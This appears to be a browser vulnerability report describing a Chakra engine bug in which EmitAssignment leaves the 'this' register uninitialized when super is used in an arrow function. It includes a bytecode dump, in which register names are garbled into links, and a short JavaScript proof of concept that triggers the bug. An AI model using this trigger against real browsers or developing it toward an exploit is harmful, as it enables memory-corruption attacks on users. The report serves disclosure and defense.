Microsoft Edge Chakra has an issue where EmitAssignment uses the "this" register without initializing.
31e0d764931a2b83c8b59dc12ca6bb5a7d420ed10202786ef5bb60c564333388
Microsoft Edge: Chakra: EmitAssignment uses the "this" register without initializing
"EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used.
Here's the generated bytecode for the lambda function in the PoC. <a href="https://crrev.com/5" title="" class="" rel="nofollow">R5</a> is uninitialized.
Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
9 locals (1 temps from <a href="https://crrev.com/8" title="" class="" rel="nofollow">R8</a>), 1 inline cache
Constant Table:
======== =====
<a href="https://crrev.com/1" title="" class="" rel="nofollow">R1</a> LdRoot
<a href="https://crrev.com/2" title="" class="" rel="nofollow">R2</a> Ld_A (undefined)
<a href="https://crrev.com/3" title="" class="" rel="nofollow">R3</a> LdC_A_I4 int:1
0000 ProfiledLdEnvSlot <a href="https://crrev.com/6" title="" class="" rel="nofollow">R6</a> = [1][4] <0>
000c ProfiledLdEnvSlot <a href="https://crrev.com/4" title="" class="" rel="nofollow">R4</a> = [1][3] <1>
Line 28: super.a = 1;
Col 13: ^
0018 LdHomeObjProto <a href="https://crrev.com/8" title="" class="" rel="nofollow">R8</a> <a href="https://crrev.com/4" title="" class="" rel="nofollow">R4</a>
001d ProfiledStSuperFld <a href="https://crrev.com/8" title="" class="" rel="nofollow">R8</a>.(this=<a href="https://crrev.com/5" title="" class="" rel="nofollow">R5</a>) = <a href="https://crrev.com/3" title="" class="" rel="nofollow">R3</a> #0 <0>
0025 LdUndef <a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>
Line 29: }
Col 9: ^
0027 Ret
PoC:
class Parent {
};
class Child extends Parent {
constructor() {
(() => {
super.a = 10; // Implicitly use the "this" register. So it must be initialized.
})();
}
};
new Child();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt